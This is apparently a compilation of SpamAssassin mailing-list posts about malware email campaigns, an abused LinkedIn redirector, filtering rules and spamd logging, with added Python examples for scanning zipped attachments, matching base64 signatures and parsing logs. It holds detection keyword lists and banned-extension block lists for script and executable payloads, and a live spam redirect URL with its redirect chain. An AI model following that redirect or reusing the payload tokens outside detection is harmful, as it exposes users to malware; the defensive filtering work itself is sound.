Plus I recently wrote some "secret sauce" Code that looks for
javascript obfuscations. :)


We've had a very low FP rate on the above, and haven't had any
noticeable user pushback.  There have been enough high profile
infections (at least two hospitals), that most endusers have
been grateful and understanding.


>Doing it properly requires a non-trivial amount of coding.

Yes, however it's VERY satisfying Coding. :)
- "Chip"

P.S.  As of about 1700 UTC yesterday, I'm seeing significant
volume of zipped macro-encrusted "doc" files.
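Added example, not code from any of the posts in this thread (the posters' filters are not reproduced on the page), pulling together the checks discussed above: every MIME part whose decoded bytes start with the PKZip magic is treated as an archive whatever its Content-Type or filename says; each member is then checked by name (vbaProject.bin), by its last extension (so a name ending in "..wsf" still resolves to wsf), by its first bytes (MZ, the OLE compound header) inflated only a few bytes at a time, and by a keyword scan of small members. The sample message is constructed inside the block; the extension and token lists are illustrative, not a complete policy.

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

PKZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls, vbaProject.bin
# Windows executable/script extensions from the thread (illustrative, not complete).
BLOCKED_EXT = {"exe", "dll", "scr", "pif", "cpl", "com", "bat", "cmd", "hta",
               "js", "jse", "vbs", "vbe", "wsf", "wsh", "ps1"}
MAGIC = {b"MZ": "pe-executable", OLE_MAGIC: "ole-compound"}
SCRIPT_TOKENS = ("activexobject", "createobject", "eval(", "fromcharcode",
                 "savetofile", "wscript", "unescape(")
MAX_INSPECT = 1_000_000  # never inflate a member larger than this (zip-bomb guard)


def inspect_zip(blob: bytes) -> list[tuple[str, str]]:
    """Return (member_name, reason) findings for one zip blob."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return [("(unparseable)", "bad-zip")]
    for info in zf.infolist():
        name = info.filename
        lname = name.lower()
        # Member names are stored unaltered, so a plain substring test suffices.
        if "vbaproject.bin" in lname:
            findings.append((name, "vba-macro"))
        ext = lname.rsplit(".", 1)[-1] if "." in lname else ""
        if ext in BLOCKED_EXT:
            findings.append((name, "blocked-ext:" + ext))
        if info.is_dir() or info.file_size == 0 or info.file_size > MAX_INSPECT:
            continue
        with zf.open(info) as fh:
            head = fh.read(8)            # inflates only the first few bytes
            for magic, kind in MAGIC.items():
                if head.startswith(magic):
                    findings.append((name, "magic:" + kind))
            body = (head + fh.read(MAX_INSPECT)).lower()
        hits = [t for t in SCRIPT_TOKENS if t.encode() in body]
        if hits:
            findings.append((name, "script-tokens:" + ",".join(hits)))
    return findings


def scan_message(raw: bytes) -> list[tuple[str, str, str]]:
    """Walk every MIME part; a part whose decoded bytes start with the PKZip
    magic is inspected as an archive regardless of Content-Type or filename.
    Returns (part_label, member_name, reason) triples."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        if not payload.startswith(PKZIP_MAGIC):
            continue
        label = part.get_filename() or part.get_content_type()
        results.extend((label, member, reason) for member, reason in inspect_zip(payload))
    return results


def build_sample() -> bytes:
    """Constructed test message: a zip labelled application/pdf with a harmless
    filename, carrying a macro container, a renamed PE and a double-dot script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)
        zf.writestr("invoice.pdf.exe", b"MZ" + b"\x90" * 64)
        zf.writestr("0006449538..wsf", b'<job><script>eval(unescape("%41"))</script></job>')
        zf.writestr("readme.txt", b"nothing to see here")
    msg = EmailMessage()
    msg["From"] = "sender@example.net"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Invoice"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="pdf",
                       filename="invoice.pdf")
    return msg.as_bytes()
```

Reading only the first eight bytes through zf.open() is what keeps the magic check cheap; the full keyword scan is gated on file_size so a multi-gigabyte member never gets inflated, which is the trade-off the posts describe (quick tests first, slow tests only when there is budget).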




re: exploitable LinkedIn forwarder/whatever

2016-05-20 Thread Chip M.
Thanks Andreas! :)

Wednesday am, after re-checking that the specific spam URL was
still forwarding to the spam payload destination, I emailed that
role account... and to my (VERY pleasant) shock, received an
auto-reply which did NOT direct me to an unusable web form
(i.e. the Google model of preventing reports).

Three hours later, I re-checked the original URL, and it no
longer was forwarding. :)

I don't know if they did anything to the actual forwarder, but
at least I know it's NOT a waste of time to send reports. :)

I will definitely submit directly, in future.


And now, the bad news:
1. The original destination was just the first hop in a
forwarding chain, with a total of six (6) hops. :(
That should have been trivially easy to detect, automatically.
The first Location feels rather brazen (i.e. an obvious redirect).
My gut feeling is that the spammer may have been testing
LinkedIn's defenses.

2. The original spam was submitted to SpamCop, which
printed (in red):
"ISP does not wish to receive reports regarding http://www.linkedin.com/slink - 
no date available"

As a precaution, I'm now outright killing "linkedin.com/slink".

I'm particularly annoyed at this forwarder, because LI has a
Shortener service.  If the spammer had been restricted to
using a Shortener, my system would have caught it easily
(technically that spam was blocked, but just barely).

*** Question:
Are there any good public lists of, um, "weakly defended"
forwarders/redirectors?

One of the reasons I posted that spample, is that it is an
excellent example of a terse spam exploiting only well known
services.  This pattern recurs regularly, though always at
low volumes.

We educate our users to be cautious with unknown URLs, but I
wouldn't blame any non-techie who succumbed to the double-whammy
of a URL with a very familiar domain sent from the cracked account
of a bona fide friend. :(
- "Chip"




exploitable LinkedIn forwarder/whatever

2016-05-17 Thread Chip M.
Spotted a new exploited forwarder of some sort at LinkedIn -
full spample:
http://puffin.net/software/spam/samples/0041_linked_forward.txt
Except for the munged "To" and "From" email addresses, that's the
pristine network image.

It came From a known friend at "swbell", who normally sends thru
Yahoo, and has previously been cracked.

At first I assumed the URL was for an actual webpage, so I ran a
raw GET on it/this:

https://www.linkedin.com/slink?code=ecPnYgf?152=ofobakj&2643==45612858

and got a zero length document with these headers (cookie redacted):

HTTP/1.0 301 Moved Permanently
Server: Apache-Coyote/1.1
Location: http://www.shopinoklahomacity.com/redirect.aspx?url=http://icynybo.freedom007.top/free/dom/?gelaxo
Content-Length: 0
Vary: Accept-Encoding
Date: Tue, 17 May 2016 20:25:17 GMT
X-Li-Fabric: prod-lva1
Connection: keep-alive
X-Li-Pop: prod-ech2
X-LI-UUID: hNLOXbN0TxQQdMWE/SoAAA==

The redirect in the Location URL should have been a red flag to
any automated security scanner. :\

I re-ran it as a HEAD with a User-Agent that should have
screamed "spam", waited a couple hours, repeated, rinsed, stewed,
then decided to post here.

*** Does anyone have a contact at LinkedIn ops? ***

Sadly, LinkedIn follows the Google/Gmail model of failing to make
core functionality (like reporting spam) useable without
disabling/lowering one's browser security settings/shields. :(
- "Chip"




Re: new(ish) malware: RTF with MIME payload

2016-05-05 Thread Chip M.
Thanks guys, for all the helpful info and sanity checks! :)

Sorry about the Message-ID munging - I get some really useful
malware at that domain but no ham, and am a bit paranoid about
losing that feed.


Followup:
>I had considered anchoring the MIME string, however we have a 
>very powerful quarantine system, so I kept that rule simple. 
>We've had zero FPs on either rule, albeit only in xml/doc/msword 
>files.

I changed my system to run that MIME string test on all message
parts (plain text, de-MIMEd file, de-MIMEd non-file MIME), then
we did a regression test on all 2015 & 2016 ham for most of our
key corpora.  We also tested 2013 & 2014 ham-only for a few of
the most useful corpora, for a grand total of about 1.4 million
individual emails.

We found exactly zero hits on ham. :)
Not counting "my" SA list digest.

That rule is now live on all our systems, at Exterminate score.

We'll be doing a few more corpora in the next two weeks, and if
there's any hits, I'll report back.

While it is hypothetically possible that somebody would send a
document with ActiveMime, I personally am trusting my quarantine
system to detect those.  We can individually "skip" list that rule
if needed, just like we already do with Word macros and other
Pakled-icity. ;)
- "Chip"




malware campaign: javascript in ".tgz"

2016-04-21 Thread Chip M.
Starting about two hours ago, about 40% of my real-time
honeypot spam is a new malware campaign.  About a third are
hitting "BAYES_00", with about 10% of all having negative SA
scores. :(

Full spample (with munged email addresses):
http://puffin.net/software/spam/samples/0040_mal_tgz.txt
That's not a valuable honeypot address, so I've left everything
else as-is, including the Message-ID.

So far, all of these have the _EXACT_ same Message-ID, From,
and Reply-To.  I expect all to change, but they may be useful
for quick block rules.  The From account is "FSPRD" and the 
From base domain is "covance".

The filenames are all the same length, pure numeric with three
leading zeroes.  Here's a few examples:
0006449538.tgz
0007184777.tgz
0008205464.tgz
0007565676.tgz
0008113861.tgz
0001457696.tgz
0007535057.tgz
0008403752.tgz
0009470013.tgz


I'm blocking these by file extension (both ".tgz" and ".gz" to
be extra cautious).
A couple of years ago, I added a "mime prefix" rule to my post-SA
filter, and have added rules using that, in case the spammers try
the old trick of asking victims to rename the file.

I tried opening a benign ".gz" in Windows7, and it didn't
recognize it, but other versions may.  These may be targeting
other platforms (e.g. I recently learned that Chrome OS has native
support for "rar" extraction, which may explain the recent rise of
rar javascript email malware).

I've only taken a quick look at the payload.  It's javascript, but
definitely different from past campaigns.

I've been seeing a high level of "calibration" spam for over a
week, so I suspect this is a new botnet going live. :(
- "Chip"



new(ish) malware: RTF with MIME payload

2016-03-19 Thread Chip M.
Starting about two hours ago, more than 80% of my real-time
honeypot spam is a new malware campaign.

Full spample (with redacted/munged email addresses and
Message-ID):
http://puffin.net/software/spam/samples/0039_mal_rtf_mime.txt

This is a variation on an XML file malware campaign that briefly
spewed a year ago this month.

The big difference is the Content Types of the payload, which,
so far, are of three forms:

Content-Type: application/x-rtf;
name="Invoice_MKUBV53827_from_tip_top_delivery.rtf"

Content-Type: application/octet-stream;
name="Invoice_MKUBV53827_from_tip_top_delivery.rtf"

Content-Type: application/rtf;
name="Invoice_MKUBV53827_from_tip_top_delivery.rtf"

Note: I normalized all the filenames to be the same as the 
sample (i.e. "MK...").  All have been in the form A9.


*** The key very-safe-to-nuke signature (in the rtf) is:
QWN0aXZlTWltZQ
The ".mso" "name" fields have had considerable variation, both 
in length and content.
The MIME string "QWN0aXZlTWltZQ" decodes to "ActiveMime", which
immediately struck me as Dangerous Sounding. :)  So for the 
last year I've been using that as a Kill rule, specifically:


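A check a practitioner would want for the ActiveMime string above and for the May 5 followup that runs it over every de-MIMEd part: a fixed string such as QWN0aXZlTWltZQ only matches when the marker begins on a 3-byte boundary of the base64 stream, and the same bytes encode to two other spellings at the other two alignments. This added example (mine, not the poster's rule, which is not reproduced on the page) generates all three alignment variants of any marker, trimmed to the characters that depend on the marker alone, and folds them into one regex. The blobs it is tested against are constructed.

```python
import base64
import re


def base64_phases(marker: bytes) -> list[str]:
    """The three base64 spellings of `marker`, one per byte alignment, each cut
    down to the characters determined by the marker alone.  Leading chars that
    mix in the (unknown) preceding bytes and a trailing char that mixes in the
    (unknown) following byte are dropped, so each phase is a safe substring."""
    phases = []
    for offset in range(3):
        padded = b"\x00" * offset + marker
        enc = base64.b64encode(padded).decode("ascii").rstrip("=")
        if len(padded) % 3:       # final sextet shares bits with the next byte
            enc = enc[:-1]
        lead = (0, 2, 3)[offset]  # chars contaminated by the pad bytes
        phases.append(enc[lead:])
    return phases


def matches_any_phase(marker: bytes, encoded: str) -> bool:
    """True if `marker` occurs at any alignment inside a base64 text."""
    return any(p in encoded for p in base64_phases(marker))


def phase_regex(marker: bytes):
    """One compiled regex that fires on any alignment of `marker`; paste its
    pattern into whatever rule engine sees the decoded part."""
    return re.compile("|".join(re.escape(p) for p in base64_phases(marker)))
```

For "ActiveMime" the alignment-0 phase is QWN0aXZlTWltZ, i.e. the quoted string minus its last character, because that last character also encodes the top bits of whatever byte follows the marker; the quoted form still works in practice only because the following byte happens to have those bits clear.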
spamassassin logging

2015-09-17 Thread Rajesh M
hi

we are using qmailtoaster with spamassassin

currently the spamassasin log details show as such

is it possible to log the detailed information in the log files ?

ie sender email , recipient email spam rules applied and the spam score.

thanks,
rajesh



spamassassin detailed logging

2015-06-19 Thread Rajesh M
hi

i am using qmailtoaster on centos6.6 64 bit

is there a way to have detailed logging for spamassassin

which includes the sender and the recipient and the scan result.

my current logs are as such which does not show the

Jun 19 18:31:45 ns1 spamd[48983]: spamd: connection from localhost [127.0.0.1] 
at port 48151
Jun 19 18:31:45 ns1 spamd[48983]: spamd: processing message 
201506191258.t5jcvxh5015...@to5email3.gprs.rogers.com for clamav:89
Jun 19 18:31:45 ns1 spamd[41557]: spamd: connection from localhost [127.0.0.1] 
at port 48152
Jun 19 18:31:45 ns1 spamd[41557]: spamd: processing message 
002901d0aa90$10a07c70$31e17550$@com for clamav:89
Jun 19 18:31:45 ns1 spamd[48981]: spamd: clean message (0.0/5.0) for clamav:89 
in 3.5 seconds, 38701 bytes.
Jun 19 18:31:45 ns1 spamd[48981]: spamd: result: . 0 - HTML_MESSAGE 
scantime=3.5,size=38701,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48134,mid=008501d0aa90$0d4ce4a0$27e6ade0$@net,autolearn=disabled
Jun 19 18:31:45 ns1 spamd[48982]: spamd: clean message (0.0/5.0) for clamav:89 
in 3.5 seconds, 38701 bytes.
Jun 19 18:31:45 ns1 spamd[48982]: spamd: result: . 0 - HTML_MESSAGE 
scantime=3.5,size=38701,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48135,mid=008501d0aa90$0d4ce4a0$27e6ade0$@net,autolearn=disabled
Jun 19 18:31:45 ns1 spamd[48983]: spamd: identified spam (23.6/5.0) for 
clamav:89 in 0.7 seconds, 6395 bytes.
Jun 19 18:31:45 ns1 spamd[48983]: spamd: result: Y 23 - 
ADVANCE_FEE_5_NEW_MONEY,AXB_XMAILER_MIMEOLE_OL_024C2,FAKE_REPLY_C,FORGED_OUTLOOK_HTML,FORGED_OUTLOOK_TAGS,FROM_MISSPACED,FROM_MISSP_MSFT,FROM_MISSP_REPLYTO,FROM_MISSP_USER,FROM_MISSP_XPRIO,FROM_NOT_REPLYTO,FSL_CTYPE_WIN1251,FSL_NEW_HELO_USER,HTML_MESSAGE,LOTS_OF_MONEY,MIME_HTML_ONLY,MISSING_HEADERS,MONEY_FRAUD_8,MONEY_FROM_MISSP,MSOE_MID_WRONG_CASE,NSL_RCVD_FROM_USER,REPLYTO_WITHOUT_TO_CC,TO_NO_BRKTS_FROM_MSSP,TO_NO_BRKTS_MSFT,T_MONEY_PERCENT,T_US_DOLLARS_3
 
scantime=0.7,size=6395,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48151,mid=201506191258.t5jcvxh5015...@to5email3.gprs.rogers.com,autolearn=disabled
Jun 19 18:31:45 ns1 spamd[22330]: spamd: handled cleanup of child pid [48983] 
due to SIGCHLD: interrupted, signal 2 (0002)
Jun 19 18:31:46 ns1 spamd[41557]: spamd: clean message (-100.0/5.0) for 
clamav:89 in 1.0 seconds, 106108 bytes.
Jun 19 18:31:46 ns1 spamd[41557]: spamd: result: . -99 - 
HTML_MESSAGE,UNPARSEABLE_RELAY,USER_IN_WHITELIST 
scantime=1.0,size=106108,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48152,mid=002901d0aa90$10a07c70$31e17550$@com,autolearn=disabled
Jun 19 18:31:46 ns1 spamd[22330]: spamd: handled cleanup of child pid [48982] 
due to SIGCHLD: interrupted, signal 2 (0002)
Jun 19 18:31:49 ns1 spamd[26182]: spamd: identified spam (5.0/5.0) for 
clamav:89 in 16.1 seconds, 344646 bytes.
Jun 19 18:31:49 ns1 spamd[26182]: spamd: result: Y 5 - 
FILL_THIS_FORM,HTML_MESSAGE,headerSPFFAIL 
scantime=16.1,size=344646,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48119,mid=902443c7db414511a3be04e9b7f663a9@ZUARIMB2.ADVENTZ.LOCAL,autolearn=disabled

thankyou
raj
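The "spamd: result:" lines above already carry the verdict, score, rules hit, size, scan time and message-id for each scan; the message-id is the natural join key to whatever the MTA logs for the same message. An added example, not from the post: a parser for those result lines plus a rule-frequency rollup, run here over constructed lines that reproduce two of the post's entries rejoined onto the single physical line spamd writes.

```python
import re
from collections import Counter

# One "result" line as spamd writes it (the post's copies were wrapped by the
# mail client).  flag is Y for spam, "." for ham; rules is a comma list.
RESULT_RE = re.compile(
    r"spamd\[(?P<pid>\d+)\]: spamd: result: (?P<flag>[Y.]) (?P<score>-?\d+) - "
    r"(?P<rules>\S*) (?P<kv>\S+)\s*$"
)


def parse_result_line(line: str):
    """Return a dict for a 'spamd: result:' line, or None for any other line.
    The key=value tail is split on commas; a message-id that itself contains
    a comma would need a smarter split (none of the post's lines do)."""
    m = RESULT_RE.search(line)
    if not m:
        return None
    kv = dict(item.split("=", 1) for item in m["kv"].split(",") if "=" in item)
    return {
        "pid": int(m["pid"]),
        "spam": m["flag"] == "Y",
        "score": int(m["score"]),
        "rules": [r for r in m["rules"].split(",") if r],
        "scantime": float(kv.get("scantime", "0")),
        "size": int(kv.get("size", "0")),
        "user": kv.get("user"),
        "required": float(kv.get("required_score", "0")),
        "mid": kv.get("mid"),
    }


def rule_frequency(lines) -> Counter:
    """How often each rule fired across the given log lines."""
    counts = Counter()
    for line in lines:
        rec = parse_result_line(line)
        if rec:
            counts.update(rec["rules"])
    return counts


# Constructed sample: two of the post's entries rejoined onto single lines,
# plus a non-result line that the parser must ignore.
SAMPLE_LOG = [
    "Jun 19 18:31:45 ns1 spamd[48983]: spamd: connection from localhost [127.0.0.1] at port 48151",
    "Jun 19 18:31:45 ns1 spamd[48981]: spamd: result: . 0 - HTML_MESSAGE scantime=3.5,size=38701,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48134,mid=008501d0aa90$0d4ce4a0$27e6ade0$@net,autolearn=disabled",
    "Jun 19 18:31:49 ns1 spamd[26182]: spamd: result: Y 5 - FILL_THIS_FORM,HTML_MESSAGE,headerSPFFAIL scantime=16.1,size=344646,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48119,mid=902443c7db414511a3be04e9b7f663a9@ZUARIMB2.ADVENTZ.LOCAL,autolearn=disabled",
]
```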



check size of email

2015-06-02 Thread Rajesh M
hi

is there anyway to check the size of emails or count the number of characters 
in an email using spamassassin ?

basically i wish to mark emails that are less than 2 kb in size with long links 
in them as spam since they are mostly spam.

also is there any way to check if a word / excel document contains macros. (i 
do not wish to use clam av.)

rajesh



spamassassin service slow to start

2015-03-02 Thread Rajesh M
hi

am using qmailtoaster, centos 6 - 64 bit with spamassassin, dovecot, vpopmail, 
spamdyke, squirrelmail

dell server : intel hexcore 2.2 ghz proc, 16 gb ram

i have several such servers.

on one of my servers all of a sudden there was a high cpu utilization which 
continued the whole day -- all 12 cpu cores close to 100 percent continuously.

the following checks were done.

1) incoming smtp connections -- were normal - around 10 -20 simultaneous 
connections -- which is normal

2) turned off clamd - but not a significant impact

3) turned off spamassassin - cpu usage reduced a lot.

4) spamassassin -- service spamd stop -- works quickly.
service spamd start takes over a minute to start.
normally it does not take more than 10 seconds to start.

also checked dmesg, httpd, maillog, /var/log/messages, restarted bind, httpd 
... but nothing wrong in this area.

the problem got resolved automatically in the night.  spamassassin starts in 
around 10 seconds.

The same problem happened around 3 months ago -- again got 
automatically resolved.

 could someone please give me pointers as to where to troubleshoot to find 
the root cause. 

i have posted below spamassassin --debug --lint information.

spamassassin debug lint normally takes just 3 seconds to execute

however it took over a minute during the time this problem was taking place.

also it was getting stuck for over 5 seconds under Net::DNS as seen below


Mar  1 00:43:38.475 [4437] dbg: logger: adding facilities: all
Mar  1 00:43:38.477 [4437] dbg: logger: logging level is DBG
Mar  1 00:43:38.480 [4437] dbg: generic: SpamAssassin version 3.3.2
Mar  1 00:43:38.482 [4437] dbg: generic: Perl 5.010001, PREFIX=/usr, 
DEF_RULES_DIR=/usr/share/spamassassin, LOCAL_RULES_DIR=/etc/mail/spamassassin, 
LOCAL_STATE_DIR=/var/lib/spamassassin
Mar  1 00:43:38.484 [4437] dbg: config: timing enabled
Mar  1 00:43:38.500 [4437] dbg: config: score set 0 chosen.
Mar  1 00:43:38.535 [4437] dbg: util: running in taint mode? yes
Mar  1 00:43:38.537 [4437] dbg: util: taint mode: deleting unsafe environment 
variables, resetting PATH
Mar  1 00:43:38.541 [4437] dbg: util: PATH included '/usr/lib64/qt-3.3/bin', 
keeping
Mar  1 00:43:38.543 [4437] dbg: util: PATH included '/usr/local/sbin', keeping
Mar  1 00:43:38.546 [4437] dbg: util: PATH included '/usr/local/bin', keeping
Mar  1 00:43:38.548 [4437] dbg: util: PATH included '/sbin', keeping
Mar  1 00:43:38.551 [4437] dbg: util: PATH included '/bin', keeping
Mar  1 00:43:38.553 [4437] dbg: util: PATH included '/usr/sbin', keeping
Mar  1 00:43:38.556 [4437] dbg: util: PATH included '/usr/bin', keeping
Mar  1 00:43:38.561 [4437] dbg: util: PATH included '/root/bin', which is 
unusable, dropping: No such file or directory
Mar  1 00:43:38.564 [4437] dbg: util: final PATH set to: 
/usr/lib64/qt-3.3/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
Mar  1 00:43:38.663 [4437] dbg: dns: is Net::DNS::Resolver available? yes
Mar  1 00:43:38.665 [4437] dbg: dns: Net::DNS version: 0.65
Mar  1 00:43:43.266 [4437] dbg: diag: perl platform: 5.010001 linux
Mar  1 00:43:43.268 [4437] dbg: diag: [...] module installed: Digest::SHA1, 
version 2.12
Mar  1 00:43:43.269 [4437] dbg: diag: [...] module installed: HTML::Parser, 
version 3.64
Mar  1 00:43:43.271 [4437] dbg: diag: [...] module installed: Net::DNS, version 
0.65
Mar  1 00:43:43.272 [4437] dbg: diag: [...] module installed: NetAddr::IP, 
version 4.027
Mar  1 00:43:43.273 [4437] dbg: diag: [...] module installed: Time::HiRes, 
version 1.9721
Mar  1 00:43:43.274 [4437] dbg: diag: [...] module installed: Archive::Tar, 
version 1.58
Mar  1 00:43:43.276 [4437] dbg: diag: [...] module installed: IO::Zlib, version 
1.09
Mar  1 00:43:43.277 [4437] dbg: diag: [...] module installed: Digest::SHA1, 
version 2.12
Mar  1 00:43:43.278 [4437] dbg: diag: [...] module installed: MIME::Base64, 
version 3.08
Mar  1 00:43:43.279 [4437] dbg: diag: [...] module installed: DB_File, version 
1.82
Mar  1 00:43:43.281 [4437] dbg: diag: [...] module installed: Net::SMTP, 
version 2.31
Mar  1 00:43:43.282 [4437] dbg: diag: [...] module not installed: Mail::SPF 
('require' failed)
Mar  1 00:43:43.283 [4437] dbg: diag: [...] module not installed: 
IP::Country::Fast ('require' failed)
Mar  1 00:43:43.284 [4437] dbg: diag: [...] module installed: 
Razor2::Client::Agent, version 2.84
Mar  1 00:43:43.285 [4437] dbg: diag: [...] module installed: Net::Ident, 
version 1.23
Mar  1 00:43:43.287 [4437] dbg: diag: [...] module installed: 
IO::Socket::INET6, version 2.56
Mar  1 00:43:43.288 [4437] dbg: diag: [...] module installed: IO::Socket::SSL, 
version 1.31
Mar  1 00:43:43.289 [4437] dbg: diag: [...] module installed: Compress::Zlib, 
version 2.021
Mar  1 00:43:43.290 [4437] dbg: diag: [...] module installed: Mail::DKIM, 
version 0.37
Mar  1 00:43:43.291 [4437] dbg: diag: [...] module installed: DBI, version 1.609
Mar  1 00:43:43.293 [4437] dbg: diag: [...] module installed: Getopt::Long, 

Re: Recent spate of Malicious VB attachments II

2015-02-19 Thread Chad M Stewart

I use amavis-new and block based on file type.  My users should never get legit 
executables via email, so they are sent to a quarantine.

### BLOCKED ANYWHERE
# qr'^UNDECIPHERABLE$',  # is or contains any undecipherable components
  qr'^\.(exe-ms|dll)$',   # banned file(1) types, rudimentary
  qr'^\.(exe|lha|cab|dll)$',  # banned file(1) types


  # block certain double extensions in filenames
  qr'^(?!cid:).*\.[^./]*[A-Za-z][^./]*\.\s*(exe|vbs|pif|scr|bat|cmd|com|cpl|dll)[.\s]*$'i,



  qr'.\.(exe|vbs|pif|scr|cpl)$'i, # banned extension - basic


Which results in my admin mailbox receiving messages like the following:


 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 
 No viruses were found.
 
 Banned name: .exe,.exe-ms,in.exe
 Content type: Banned
 Internal reference code for the message is 90515-05/T9Uh2zuM5Ym6
 
 First upstream SMTP client IP address: [23.113.51.23]:56334
   23-113-51-23.lightspeed.irvnca.sbcglobal.net
 
 Received trace: ESMTP://[23.113.51.23]:56334
 
 Return-Path: nycs...@csis.dk
 From: nycs...@csis.dk
 Message-ID: 048678970043189683240541243784...@csis.dk
 Subject: Attention csis
 The message has been quarantined as: banned-T9Uh2zuM5Ym6
 
 The message WAS NOT relayed to:
 spamt...@ubefree.net:
250 2.7.0 ok, discarded, id=90515-05 - banned: .exe,.exe-ms,in.exe
 
 


-Chad



Re: rule for restricting incoming email

2015-02-11 Thread Rajesh M
hi

i am using qmailtoaster

when the emails are sent to specified recipients via bcc then there is a header
Delivered-To created which i tried to use to check

however spamassassin does not seem to check Delivered-To header

what could be the problem ?

rajesh



- Original Message -
From: David B Funk [mailto:dbf...@engineering.uiowa.edu]
To: users@spamassassin.apache.org
Sent: Tue, 10 Feb 2015 17:17:32 -0600 (CST)
Subject: Re: rule for restricting incoming email

On Tue, 10 Feb 2015, Benny Pedersen wrote:

 Antony Stone skrev den 2015-02-10 21:33:

 What happens to an email from u...@abc.com, sent to someone other than
 u...@recipient.example.com?  Won't that then be whitelisted, even though
 whoever it's addressed to hasn't asked for that (only user@recipient asked
 for
 this treatment)?

 yes add all recipients to blacklist_to, missing that will be whitelist, but
 only from whitelist_from senders

 Also, does blacklist_to u...@recipient.example.org match on emails where
 u...@recipient.example.org is only a BCC address?

 spamassassin does not see bcc anyway imho

A BCCed recipient doesn't show up in a 'To/Cc' header (the whole point
of 'Bcc') but obviously must be listed in the envelope recipient list.
(assuming the glue you're using in your system exposes that info to SA).

The blacklist_to/whitelist_to will work on the envelope recipient list
so (assuming your glue is right) Bcc shouldn't be a problem.


--
Dave Funk  University of Iowa
dbfunk (at) engineering.uiowa.eduCollege of Engineering
319/335-5751   FAX: 319/384-0549   1256 Seamans Center
Sys_admin/Postmaster/cell_adminIowa City, IA 52242-1527
#include std_disclaimer.h
Better is not better, 'standard' is better. B{



rule for restricting incoming email

2015-02-10 Thread Rajesh M
hi

i have an email id : u...@abc.com

now i need to set a rule such that u...@abc.com can receive emails only from 
specific external domains and rest all should be rejected as spam

i have set a rule as such

header MYDOMAIN_A ToCc =~ /\b(?:test\@mydomain\.com)\b/i

header MYDOMAIN_B Delivered-To =~ /\b(?:test\@mydomain\.com)\b/i

header __MYDOMAIN_C From =~ /\b(?:trustedsender\.com)\b/i

meta MYDOMAIN ( ( MYDOMAIN_A + MYDOMAIN_B ) > 0 ) && ( __MYDOMAIN_C == 1 )
score MYDOMAIN -100.0

meta MYDOMAIN_SPAM ( ( MYDOMAIN_A + MYDOMAIN_B ) > 0 ) && ( __MYDOMAIN_C == 0 )
score MYDOMAIN_SPAM 100.0

during the tests : to and cc works correctly

i send bcc email to test@mydomain. then the header contains Delivered-To

how to resolve this problem
thanks
rajesh





Whitelist one mail with multiple destinations

2014-09-10 Thread M. Rodrigo Monteiro
Hi. Here is my scenario:

Internet - MX (Postfix) - Relay (Postfix + Amavis with SpamAssassin) - Zimbra

In SpamAssassin, I have a whitelist/blacklist. All the e-mail passes
through, but Spams are tagged (header and subject).

My problem is that when an e-mail comes to multiple destinations and
one of them is whitelisted, all these destinations become whitelisted
too.

In the real example below, the e-mail cs...@mydomain.com is
whitelisted (-200 score). An unique e-mail (spam) comes to 20, 30
destinations and one of them is cs...@mydomain.com. All the
destinations were whitelisted (-200 score).

Here is the header of one e-mail and the log of Postfix.
This behavior is SpamAssassin or Amavisd-new?



Return-Path: laura...@semarh.goias.gov.br
Received: from eticesrv007.mydomain.com (LHLO
 eticesrv007.mydomain.com) (172.26.70.7) by eticesrv007.mydomain.com
 with LMTP; Tue, 9 Sep 2014 23:31:39 -0300 (BRT)
Received: from filtrodeconteudo1.mydomain.com (unknown [172.26.2.44])
by eticesrv007.mydomain.com (Postfix) with ESMTPS id 8F987884A55;
Tue,  9 Sep 2014 23:31:39 -0300 (BRT)
Received: from localhost (localhost [127.0.0.1])
by filtrodeconteudo1.mydomain.com (Postfix) with ESMTP id B3DEB2A016F;
Tue,  9 Sep 2014 23:31:39 -0300 (BRT)
X-Virus-Scanned: amavisd-new at mydomain.com
X-Spam-Flag: NO
X-Spam-Score: -200.771
X-Spam-Level:
X-Spam-Status: No, score=-200.771 required=5 tests=[AWL=-5.000, BAYES_00=-4,
DCC_CHECK=10, RCVD_IN_MSPIKE_H2=-1.77, SPF_PASS=-0.001,
USER_IN_WHITELIST_TO=-200] autolearn=no autolearn_force=no
Received: from filtrodeconteudo1.mydomain.com ([127.0.0.1])
by localhost (intsrv044.mydomain.com [127.0.0.1]) (amavisd-new, port 10024)
with LMTP id lTZPuM5PkD9Y; Tue,  9 Sep 2014 23:31:37 -0300 (BRT)
Received: from mx1.mydomain.com (mx1.mydomain.com [MX_IP])
by filtrodeconteudo1.mydomain.com (Postfix) with ESMTPS id A55772A016D;
Tue,  9 Sep 2014 23:31:37 -0300 (BRT)
X-Greylist: delayed 636 seconds by postgrey-1.35 at
intsrv036.mydomain.com; Tue, 09 Sep 2014 23:31:24 BRT
DKIM-Filter: OpenDKIM Filter v2.9.2 mx1.mydomain.com DEEE41A0057
DMARC-Filter: OpenDMARC Filter v1.2.0 mx1.mydomain.com DEEE41A0057
Authentication-Results: intsrv036.mydomain.com; dmarc=none
header.from=semarh.goias.gov.br
Received-SPF: pass (semarh.goias.gov.br: 189.2.188.131 is authorized
to use 'laura...@semarh.goias.gov.br' in 'mfrom' identity (mechanism
